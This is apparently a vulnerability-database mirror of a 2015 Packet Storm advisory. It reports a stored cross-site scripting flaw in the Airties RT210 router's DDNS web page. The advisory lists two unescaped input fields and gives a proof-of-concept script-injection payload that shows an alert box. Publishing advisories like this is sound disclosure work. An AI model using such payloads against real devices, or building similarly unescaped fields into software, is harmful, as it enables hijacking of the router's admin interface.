Search...

Airties RT210 Cross Site Scripting

2015-06-05T00:00:00

ID PACKETSTORM:132178
Type packetstorm
Reporter B3mB4m
Modified 2015-06-05T00:00:00

Description

                                        
                                            `Airties RT210 Web Interface Stored XSS Vulnerability  
  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Discovered by: B3mB4m  
[~] Contact : b3mb4m@gmail.com  
[+] Greetz : SYS & & KnocKout & Septemb0x  
############################################################  
  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Hardware/Web App : Airties  
|~Affected Version : AirRT210  
|~Official Web: http://www.airties.com  
|~RISK : Hight  
  
----------------------------------------------------------  
Proof video: https://www.youtube.com/watch?v=OOZwGeG8p3M  
----------------------------------------------------------  
Post  
----------------------------------------------------------  
Vul Link : http://192.168.2.1/ddns.stm  
  
1) &lt;input maxlength="49" size="50" name="ddns_domainame" value=""&gt;  
2) &lt;input maxlength="49" size="50" name="ddns_account" value=""&gt;  
  
Payload : '"&gt;&lt;SCrIpT&gt;alert("B3mB4m")&lt;/ScRiPt&gt;  
`

JSON Vulners Source

Initial Source

{"hash": "bf0bf91679beedd9640d421c6a9237a40c418a1d68559b40859617c0be847c70", "sourceHref": "https://packetstormsecurity.com/files/download/132178/airtiesrt210-xss.txt", "title": "Airties RT210 Cross Site Scripting", "id": "PACKETSTORM:132178", "published": "2015-06-05T00:00:00", "description": "", "modified": "2015-06-05T00:00:00", "sourceData": "`Airties RT210 Web Interface Stored XSS Vulnerability \n \n~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n[+] Discovered by: B3mB4m \n[~] Contact : b3mb4m@gmail.com \n[+] Greetz : SYS & & KnocKout & Septemb0x \n############################################################ \n \n~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n|~Hardware/Web App : Airties \n|~Affected Version : AirRT210 \n|~Official Web: http://www.airties.com \n|~RISK : Hight \n \n---------------------------------------------------------- \nProof video: https://www.youtube.com/watch?v=OOZwGeG8p3M \n---------------------------------------------------------- \nPost \n---------------------------------------------------------- \nVul Link : http://192.168.2.1/ddns.stm \n \n1) <input maxlength=\"49\" size=\"50\" name=\"ddns_domainame\" value=\"\"> \n2) <input maxlength=\"49\" size=\"50\" name=\"ddns_account\" value=\"\"> \n \nPayload : '\"><SCrIpT>alert(\"B3mB4m\")</ScRiPt> \n`\n", "reporter": "B3mB4m", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "926fcf652c962577098c5889bf2cb455"}, {"key": "modified", "hash": "4c6596a131620cfc52eeb0f4043e32e9"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "4c6596a131620cfc52eeb0f4043e32e9"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "d786c627e1d524bd68352d861db17ba8"}, {"key": "sourceData", "hash": "c8d3eac3769b6f65b7ed35094c52ca05"}, {"key": "sourceHref", "hash": "858d7712023ff092229c9af6c12c0c04"}, {"key": "title", "hash": "6a14ebb25eae8d5ff94350e6112563ed"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/132178/Airties-RT210-Cross-Site-Scripting.html", "lastseen": "2016-11-03T10:20:01", "viewCount": 0, "enchantments": {"vulnersScore": 6.1}}